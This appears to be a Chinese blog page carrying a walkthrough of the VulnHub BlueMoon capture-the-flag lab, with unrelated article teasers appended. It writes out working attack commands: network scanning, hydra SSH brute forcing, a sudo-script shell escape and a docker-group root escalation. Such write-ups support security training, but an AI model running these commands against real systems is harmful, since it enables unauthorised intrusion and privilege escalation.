当前位置：首页 > news >正文

VulnHub：BlueMoon

news 2026/2/9 16:53:55

准备工作

靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。

信息收集

主机发现

攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为：192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21，22，80端口。

21端口ftp服务，vsftpd 3.0.3
22端口ssh服务，OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80端口http服务，Apache httpd 2.4.38

web站点信息收集

访问http服务，首页如下：

没什么信息，目录扫描dirsearch -u http://192.168.31.228，没信息，换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图：

Thank You指向另一个路径，访问得到一个二维码。

扫描内容如下：

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容，可知涉及FTP的简单的shell脚本的使用，ftp用户名是userftp，密码是ftpp@ssword，直接登录即可。这里我写的shell脚本，来显示文件列表（纯纯试一下ftp的简单shell脚本如何使用，都给出了用户名和密码直接登录即可，最终目的就是拿到ftp服务器中的两个文件）

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 推出ftp会话
EOF

执行shell脚本得到ftp当前工作目录，和文件列表。

修改一下shell脚本，下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt，information.txt内容如下：

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin，并给出了密码字典，爆破吧。

ssh爆破

给出了用户名和字典，hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码：k4rv3ndh4nh4ck3r。

ssh登录过程中有点小问题，提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ，解决方法如下：

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt，但是仅jerry才有读权。

提权

sudo提权

sudo提权，sudo -l，发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限，放弃写入反弹shell的方法，直接执行，提示需要输入名字和目标机器。

sudo -u jerry ./feedback.shEnter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry，注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户，且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充：为什么能利用docker容器提权？因为用户创建一个docker容器后，容器内默认是root账户，会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

VulnHub：BlueMoon

准备工作靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。信息收集主机发现攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。 nmap 192.168.31.0/24 -Pn -T4 目标靶机ip为：192…...

编程日记 2024/8/16 17:40:54

处理filter里抛出的异常

Filter 的异常是在 org.apache.catalina.core.ApplicationFilterChain.internalDoFilter()这里扔出来的。Filter是tomcat负责调用执行的，所以会比 servlet（尤其是SpringMVC 的dispatcherServlet ）先执行，所以 Filter 里的错误&…...

编程日记 2024/8/16 17:39:53

IndexedDB深度解析：JavaScript的客户端数据库

IndexedDB是一个在用户浏览器中运行的低等级API，用于存储大量结构化数据。作为NoSQL数据库，IndexedDB为Web应用程序提供了丰富的数据存储能力，支持键值对存储、索引、事务和复杂查询等功能。本文将详细介绍IndexedDB的基本概念、工作原理、使…...

编程日记 2024/8/16 17:38:51

C语言中的函数指针和返回值为数组的函数指针对比

函数指针 //定义一个函数指针，函数的参数是int型，返回值为int typedef int （*func)(int);//定义一个函数指针，函数的参数是int*型，返回值为int* typedef int* (*func)(int *);定义一个返回值为数组指针的函数 //定义…...

编程日记 2024/8/16 17:37:50

根据字符串的长度和字符值的大小来对字符串切片进行排序

在 Go 语言中，根据字符串的长度和字符值的大小来对字符串切片进行排序。示例如下: package mainimport ("fmt""sort" )// 自定义类型，以实现排序接口 type byLengthAndValue []string// 实现 sort.Interface 的 Len 方法 func (s b…...

编程日记 2024/8/16 17:35:48

RabbitMQ 的工作原理

下面是rabbitmq 的工作原理图解 1、客户端连接到消息队列服务器，打开一个channel。 2、客户端声明一个exchange，并设置相关属性。 3、客户端声明一个queue，并设置相关属性。 4、客户端使用routing key， 在exchange和queue 之间…...

编程日记 2024/8/16 17:34:46

WPF 资源、引用命名空间格式、FrameworkElement、Binding、数据绑定

资源对象级别独立文件静态资源使用(StaticResource)指的是在程序载入内存时对资源的一次性使用，之后就不再去访问这个资源了。动态资源使用（DynamicResource）使用指的是在程序运行过程中仍然会去访问资源。显然，如果你确定…...

编程日记 2024/8/16 17:32:44

vue3-03-创建响应式数据的几种方法

响应式数据一、 ref 创建：响应式数据1）ref 创建：基本类型的响应式数据2）ref 创建：对象类型的响应式数据3）volar 插件自动添加 .value4）customRef 自定义 ref 二、 reactive 创建：响…...

编程日记 2024/8/16 17:31:43

stm32智能颜色送餐小车（openmv二维码识别+颜色识别+oled显示）

大家好啊，我是情谊，今天我们来介绍一下我最近设计的stm32产品，我们在今年七月份的时候参加了光电设计大赛，我们小队使用的就是stm32的智能送餐小车，虽然止步于省赛，但是还是一次成长的经验吧，那…...

编程日记 2024/8/16 17:28:39

对接的广告平台越多，APP广告变现的收益越高？

无论是游戏、社交、工具应用类APP还是泛娱乐类APP，流量变现的方式主要有广告、内购、订阅三种方式。其中，广告变现是门槛最低、适用最广的变现方式。只要APP有流量，就可以进行广告变现，让APP的流量快速转化为商业价值。作为最常…...

编程日记 2024/8/16 17:25:36

LINUX原始机安装JDK

文章目录下载 JDK压缩包创建jdk文件夹sftp 远程上传解压缩 tar -zxvf 包名配置环境变量刷新环境变量验证是否安装成功安装JAVA 依赖yum更新及替换镜像curl 命令下载更新更新yum依赖判断repo文件是否存在生成缓存、启用阿里云镜像重新下载java依赖再次验证hello world 下载 J…...

编程日记 2024/8/16 17:24:35

MR400D工业级带网口4G DTU：RS232/RS485 TO LTE深度测评

在物联网技术日新月异的今天，数据传输的效率和稳定性成为了各行各业关注的焦点。作为一款集先进性与实用性于一身的物联网设备，工业级带网口的4G DTU（数据传输单元）以其强大的功能特性和广泛的应用场景，赢得了市场的广…...

编程日记 2024/8/16 17:23:33

第四范式发布AI+5G视频营销产品助力精准获客与高效转化

产品上新 Product Release 今天，第四范式AI5G视频电话互动营销产品全新发布。相较于以往销效率低、互动差、转化差的传统电话外呼和短信营销方式，视频电话互动营销基于AI、5G等技术，可让用户接听电话时观看个性化视频广告并实时互动&#xf…...

编程日记 2024/8/16 17:21:31

DVWA-IDS测试（特殊版本）

起因浏览DVWA历史更新记录发现有版本带有IDS插件，可以用于平时没有相关设备等场景演示用，所以开启本次测试。下载官方最新版本是移除了IDS插件，原因是“从不使用”，所以需要下载移除该插件之前的版本。 https://github.com/…...

编程日记 2024/8/16 17:20:30

轻度自闭症的温柔启航：星启帆的康复之旅

在儿童成长的道路上，自闭症作为一种复杂的神经发展障碍，给许多家庭带来了挑战与困扰。轻度自闭症，作为自闭症谱系中的一个类型，其症状表现相对较轻，但同样需要我们的关注与科学的干预。星启帆自闭症儿童康复机构&#…...

编程日记 2024/8/16 17:19:29

一、OpenTK简介

文章目录一、历史和发展二、功能和优势（一）强大的图形渲染功能（二）跨平台支持（三）与 C# 的紧密集成（四）开源和活跃的社区（五）性能优化三、适用场景（一）游戏开发（二）科学计算可视化（三）虚拟现实和增强现实应用（四）图形用户界面开发（五）教育和培训应用（六）…...

编程日记 2024/8/16 17:17:27

Dom4j详细介绍

Dom4j 1.1 解析概览将数据存储为XML格式后，程序化地访问这些数据变得至关重要。虽然Java基础的IO操作能够实现这一目标，但这一过程往往既复杂又繁琐，尤其是在处理大型文件或需要频繁读写操作的场景下。为了解决这些问题，开发者…...

编程日记 2024/8/16 17:16:25

thissuper

this&super 一、 this this关键字表示调用的是当前类的成员变量或者成员方法一般情况下，可以省略this关键字直接调用成员变量以及成员方法但当方法的形参与成员变量同名时，如果要在方法内使用成员变量，必须添加this关键字指明使用的是…...

编程日记 2024/8/16 17:14:22

cv::normalize（）

cv::normalize()函数是OpenCV库中用于对矩阵或图像数据进行归一化处理的工具。归一化是图像处理和计算机视觉中常见的预处理步骤，它可以确保数据在一定范围内，从而有助于后续的处理和算法的稳定性和性能。cv::normalize()函数可以将输入矩阵的值缩放到一…...

编程日记 2024/8/16 17:12:20

【Python快速入门和实践016】Python常用脚本-对视频抽取指定帧数并保存

一、功能介绍这段代码的功能是从一个视频文件中抽取指定数量的帧，并将这些帧保存为图像文件。步骤如下： 设置路径和参数： video_path：视频文件的路径。image_folder：保存抽取图像的目录。num_frames_to_extract&#…...

编程日记 2024/8/16 17:09:17

基于uniapp+WebSocket实现聊天对话、消息监听、消息推送、聊天室等功能，多端兼容

基于 UniApp + WebSocket实现多端兼容的实时通讯系统，涵盖WebSocket连接建立、消息收发机制、多端兼容性配置、消息实时监听等功能，适配微信小程序、H5、Android、iOS等终端目录技术选型分析WebSocket协议优势UniApp跨平台特性WebSocket 基础实现连接管理消息收发连接…...

编程新知 2026/1/22 16:15:42

RSS 2025｜从说明书学习复杂机器人操作任务：NUS邵林团队提出全新机器人装配技能学习框架Manual2Skill

视觉语言模型（Vision-Language Models, VLMs），为真实环境中的机器人操作任务提供了极具潜力的解决方案。尽管 VLMs 取得了显著进展，机器人仍难以胜任复杂的长时程任务（如家具装配），主要受限于人…...

编程新知 2026/1/31 5:30:51

Chromium 136 编译指南 Windows篇：depot_tools 配置与源码获取（二）

引言工欲善其事，必先利其器。在完成了 Visual Studio 2022 和 Windows SDK 的安装后，我们即将接触到 Chromium 开发生态中最核心的工具——depot_tools。这个由 Google 精心打造的工具集，就像是连接开发者与 Chromium 庞大代码库的智能桥梁…...

编程新知 2026/2/8 22:05:17

HybridVLA——让单一LLM同时具备扩散和自回归动作预测能力：训练时既扩散也回归，但推理时则扩散

前言如上一篇文章《dexcap升级版之DexWild》中的前言部分所说，在叠衣服的过程中，我会带着团队对比各种模型、方法、策略，毕竟针对各个场景始终寻找更优的解决方案，是我个人和我司「七月在线」的职责之一且个人认为&#xff0c…...

编程新知 2026/1/19 6:41:37

uniapp 集成腾讯云 IM 富媒体消息（地理位置/文件）

UniApp 集成腾讯云 IM 富媒体消息全攻略（地理位置/文件） 一、功能实现原理腾讯云 IM 通过消息扩展机制支持富媒体类型，核心实现方式： 标准消息类型：直接使用 SDK 内置类型（文件、图片等）自…...

编程新知 2025/10/25 5:53:05

SQL Server 触发器调用存储过程实现发送 HTTP 请求

文章目录需求分析解决第 1 步：前置条件，启用 OLE 自动化方式 1：使用 SQL 实现启用 OLE 自动化方式 2：Sql Server 2005启动OLE自动化方式 3：Sql Server 2008启动OLE自动化第 2 步：创建存储过程第 3 步：创建触发器扩展 - 如何调试？第 1 步：登录 SQL Server 2008第 2 步…...

编程新知 2025/9/11 6:56:11

rknn toolkit2搭建和推理

安装Miniconda Miniconda - Anaconda Miniconda 选择一个新的版本 ，不用和RKNN的python版本保持一致使用 ./xxx.sh进行安装下面配置一下载源 # 清华大学源（最常用） conda config --add channels https://mirrors.tuna.tsinghua.edu.cn…...

编程新知 2026/2/7 7:52:41